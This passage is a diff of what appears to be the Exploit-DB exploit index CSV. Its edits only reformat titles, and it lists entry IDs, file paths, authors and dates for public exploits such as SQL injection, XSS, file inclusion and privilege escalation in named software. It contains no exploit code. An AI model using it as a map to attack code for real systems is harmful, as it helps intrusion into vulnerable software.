7C - FolderManager.ASPX Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - login.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 -29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 +29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 members.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 applications/SecureLoginManager/inc_secureloginmanager.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 29362,platforms/multiple/dos/29362.pl,"DB Hub 0.3 - Remote Denial of Service",2006-12-27,"Critical Security",multiple,dos,0 @@ -26379,15 +26379,15 @@ id,file,description,date,author,platform,type,port 29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter XSS",2006-12-27,Lostmon,php,webapps,0 29371,platforms/multiple/remote/29371.txt,"Oracle 10g Portal Key Parameter Cross-Site Scripting",2006-12-29,"Pham Duc Hai",multiple,remote,0 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 -29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0 +29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0 29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - IPHLPAPI.DLL Local Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local,0 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 ashop/basket.php cat Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 ashop/search.php searchstring Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 -29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 admin/editcatalogue.php cat Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 -29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 admin/salesadmin.php resultpage Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 -29383,platforms/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin Open Parameters Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 +29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 +29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter XSS",2007-01-02,"Hackers Center Security",php,webapps,0 +29383,platforms/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin - Open Parameters Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - Search.ASP Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download Down.ASP SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - (SEH) Buffer Overflow PoC",2013-11-03,"Mike Czumak",windows,dos,0 @@ -26409,7 +26409,7 @@ id,file,description,date,author,platform,type,port 29402,platforms/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos,0 29403,platforms/windows/local/29403.txt,"HP Multiple Products PML Driver HPZ12 - Local Privilege Escalation",2007-01-08,Sowhat,windows,local,0 29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x - AJAX Index.php Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps,0 -29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 Comment.php SQL Injection",2007-01-09,yorn,php,webapps,0 +29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 - Comment.php SQL Injection",2007-01-09,yorn,php,webapps,0 29406,platforms/solaris/dos/29406.c,"Sun Solaris 9 RPC Request Denial of Service",2007-01-09,"Federico L. Bossi Bonin",solaris,dos,0 29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - admin/admin_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29408,platforms/php/webapps/29408.txt,"Magic Photo Storage Website - admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 @@ -26451,7 +26451,7 @@ id,file,description,date,author,platform,type,port 29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (DoS)",2013-11-05,"Necmettin COSKUN",windows,dos,0 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Local Privilege Escalation",2006-12-18,anonymous,linux,local,0 -29447,platforms/windows/dos/29447.txt,"WinZip 9.0 Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos,0 +29447,platforms/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos,0 29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 29449,platforms/multiple/remote/29449.html,"Oracle ORADC ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 @@ -26469,9 +26469,9 @@ id,file,description,date,author,platform,type,port 29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 user_detail.php u Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 tell_friend.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29461,platforms/osx/dos/29461.txt,"Apple WebKit build 18794 WebCore Remote Denial of Service",2007-01-15,"Tom Ferris",osx,dos,0 -29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 sendmail.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 +29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - sendmail.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional WSFTPURL.EXE Local Memory Corruption",2007-01-15,LMH,windows,dos,0 -29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 AdminLien.php Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 +29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - AdminLien.php Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 29465,platforms/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",windows,local,0 29466,platforms/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps,0 29467,platforms/linux/local/29467.c,"Rixstep Undercover - Local Privilege Escalation",2007-01-15,"Rixstep Pwned",linux,local,0 @@ -26481,7 +26481,7 @@ id,file,description,date,author,platform,type,port 29471,platforms/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection",2007-11-16,"Collin Mulliner",linux,remote,0 29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 - Index.php Cross-Site Scripting",2007-01-16,"Jesper Jurcenoks",php,webapps,0 29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Remote File Upload",2013-11-07,link_satisi,php,webapps,0 -29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 send_pwd.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 +29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 - send_pwd.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - search.php keyword Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 register.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 power_search.php Multiple Parameter XSS",2007-01-16,SwEET-DeViL,php,webapps,0 @@ -26532,8 +26532,8 @@ id,file,description,date,author,platform,type,port 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0 30200,platforms/php/webapps/30200.txt,"PHP Hosting Biller 1.0 - Index.php Cross-Site Scripting",2007-08-18,Serapis.net,php,webapps,0 -30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 -30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 +30015,platforms/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - Lang Cookie Parameter Local File Inclusion",2007-05-08,netVigilance,php,webapps,0 +30016,platforms/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote,0 30017,platforms/unix/local/30017.sh,"HP Tru64 5.0.1 - DOP Command Local Privilege Escalation",2007-05-08,"Daniele Calore",unix,local,0 30018,platforms/linux/remote/30018.py,"Python 2.5 PyLocale_strxfrm Function Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote,0 30019,platforms/windows/remote/30019.c,"CA Multiple Products Console Server and InoCore.dll - Remote Code Execution Vulnerabilities",2007-05-09,binagres,windows,remote,0 @@ -26547,11 +26547,11 @@ id,file,description,date,author,platform,type,port 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 30028,platforms/php/webapps/30028.txt,"EQDKP 1.3.1 Show Variable Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 30014,platforms/windows/local/30014.py,"Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002)",2013-12-03,ryujin,windows,local,0 -29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 (class.utilitycontroller.php) - PHP Object Injection",2013-11-08,EgiX,php,webapps,80 +29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - (class.utilitycontroller.php) PHP Object Injection",2013-11-08,EgiX,php,webapps,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 -29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 (objectDetail.php objectId param) - SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 +29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - (objectDetail.php objectId param) SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - CSRF (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service",2007-01-24,"Lubomir Kundrak",linux,dos,0 @@ -26563,7 +26563,7 @@ id,file,description,date,author,platform,type,port 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 M3U Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_Mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 -29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 Admin.php Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 +29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 - Admin.php Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 29530,platforms/php/webapps/29530.txt,"FD Script 1.3.x - FName Parameter Information Disclosure",2007-01-26,ajann,php,webapps,0 29531,platforms/windows/dos/29531.txt,"Yahoo! Messenger 8.0 Notification Message HTML Injection",2007-01-26,"Hai Nam Luke",windows,dos,0 29532,platforms/osx/dos/29532.txt,"Apple Installer Package 2.1.5 - Filename Format String",2007-01-27,LMH,osx,dos,0 @@ -26575,10 +26575,10 @@ id,file,description,date,author,platform,type,port 29538,platforms/windows/remote/29538.c,"SSC DiskAccess NFS Client DAPCNFSD.DLL Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 -29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 setup.php PATH_INFO Parameter XSS",2007-02-26,r00t,php,webapps,0 +29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter XSS",2007-02-26,r00t,php,webapps,0 39839,platforms/osx/dos/39839.txt,"Apple Quicktime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0 29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0 -29679,platforms/php/webapps/29679.html,"PHPBB2 Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 +29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Security Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 Main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - index.php Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - Post.php Cross-Site Scripting",2007-02-26,Samenspender,php,webapps,0 @@ -26613,7 +26613,7 @@ id,file,description,date,author,platform,type,port 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion",2007-02-05,anonymous,php,webapps,0 -29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.php3 - Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 +29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 29572,platforms/php/webapps/29572.txt,"CPanel 11 PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 @@ -26640,10 +26640,10 @@ id,file,description,date,author,platform,type,port 29593,platforms/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - tagmin/wordfilter.php admin Parameter Remote File Inclusion",2007-02-12,K-159,php,webapps,0 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - (.wstyle) Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 P Parameter Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 -29596,platforms/asp/webapps/29596.txt,"EWay 4 Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 +29596,platforms/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server SearchResults.ASPX Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps,0 29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - Templates.php Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps,0 -29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 Error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 +29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 - Error.php Cross-Site Scripting",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site listmain.asp cat Parameter XSS",2007-02-13,ShaFuck31,asp,webapps,0 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 directions.php typeID Parameter SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0 @@ -26655,7 +26655,7 @@ id,file,description,date,author,platform,type,port 29607,platforms/windows/dos/29607.html,"EasyMail Objects 6.x - Connect Method Remote Stack Buffer Overflow",2007-02-02,"Paul Craig",windows,dos,0 29608,platforms/php/webapps/29608.txt,"CedStat 1.31 - index.php hier Parameter XSS",2007-02-16,sn0oPy,php,webapps,0 29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 Include.php Remote File Inclusion",2007-02-16,KaRTaL,php,webapps,0 -29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 Administrative Authentication Bypass",2007-02-16,sn0oPy,php,webapps,0 +29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 - Administrative Authentication Bypass",2007-02-16,sn0oPy,php,webapps,0 29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 H_Goster.ASP SQL Injection",2007-02-16,chernobiLe,asp,webapps,0 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF",2013-11-15,"Yakir Wizman",hardware,webapps,0 29613,platforms/windows/dos/29613.txt,"CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow",2013-11-15,"Mike Czumak",windows,dos,0 @@ -26677,7 +26677,7 @@ id,file,description,date,author,platform,type,port 29629,platforms/php/webapps/29629.txt,"Magic News Plus 1.0.2 n_layouts.php link_parameters Parameter XSS",2007-02-21,"HACKERS PAL",php,webapps,0 29630,platforms/windows/local/29630.c,"Microsoft Windows 2003/XP - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0 29631,platforms/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0 -29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 +29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",ios,webapps,0 29634,platforms/php/webapps/29634.txt,"Plantilla list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 Edit.php Directory Traversal",2007-02-22,"laurent gaffie",php,webapps,0 @@ -26715,7 +26715,7 @@ id,file,description,date,author,platform,type,port 29668,platforms/php/webapps/29668.txt,"WordPress Dimension Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 29669,platforms/php/webapps/29669.txt,"WordPress Amplus Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 29670,platforms/php/webapps/29670.txt,"WordPress Make A Statement (MaS) Theme - CSRF",2013-11-18,DevilScreaM,php,webapps,80 -30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30367,platforms/php/webapps/30367.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 - admin/membersearch.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0 30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial of Service",2007-05-13,"Moshe Ben-Abu",windows,dos,0 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps,0 @@ -26744,11 +26744,11 @@ id,file,description,date,author,platform,type,port 29702,platforms/php/webapps/29702.txt,"WordPress 2.1.1 - wp-includes/theme.php iz Variable Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps,0 29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 ViewBugs.php s Variable SQL",2007-02-26,CorryL,php,webapps,0 29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - Login.php PATH_INFO Parameter XSS",2007-02-26,CorryL,php,webapps,0 -29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 Register.php PATH_INFO Parameter XSS",2007-02-26,CorryL,php,webapps,0 +29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - Register.php PATH_INFO Parameter XSS",2007-02-26,CorryL,php,webapps,0 29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0 29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash PoC",2013-11-19,"Debasish Mandal",windows,dos,0 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 -30368,platforms/php/webapps/30368.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 +30368,platforms/php/webapps/30368.txt,"AlstraSoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30369,platforms/php/webapps/30369.txt,"AlstraSoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30370,platforms/php/webapps/30370.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/temp.php rowid Parameter XSS",2007-07-23,Lostmon,php,webapps,0 30371,platforms/php/webapps/30371.txt,"AlstraSoft Affiliate Network Pro 8.0 merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0 @@ -26792,14 +26792,14 @@ id,file,description,date,author,platform,type,port 29750,platforms/php/webapps/29750.php,"PHPStats 0.1.9 - Multiple SQL Injection",2007-03-16,rgod,php,webapps,0 29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 PHP-Stats-Options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0 29752,platforms/php/remote/29752.php,"PHP 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness",2007-03-19,"Stefan Esser",php,remote,0 -29753,platforms/linux/remote/29753.c,"File(1) 4.13 Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 +29753,platforms/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0 -29755,platforms/php/webapps/29755.html,"Guesbara 1.2 Administrator Password Change",2007-03-19,Kacper,php,webapps,0 -29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0 +29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 +29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Inclusion And Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 @@ -26811,7 +26811,7 @@ id,file,description,date,author,platform,type,port 29769,platforms/linux/remote/29769.txt,"Opera 9.x - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote,0 29771,platforms/windows/remote/29771.txt,"Microsoft Windows Vista Windows Mail Local File Execution",2007-03-23,kingcope,windows,remote,0 -29772,platforms/php/webapps/29772.txt,"Free File Hosting System 1.1 contact.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 +29772,platforms/php/webapps/29772.txt,"Free File Hosting System 1.1 - contact.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 - login.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 register.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion",2007-03-26,Crackers_Child,php,webapps,0 @@ -26822,8 +26822,8 @@ id,file,description,date,author,platform,type,port 29782,platforms/php/webapps/29782.txt,"Satel Lite Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 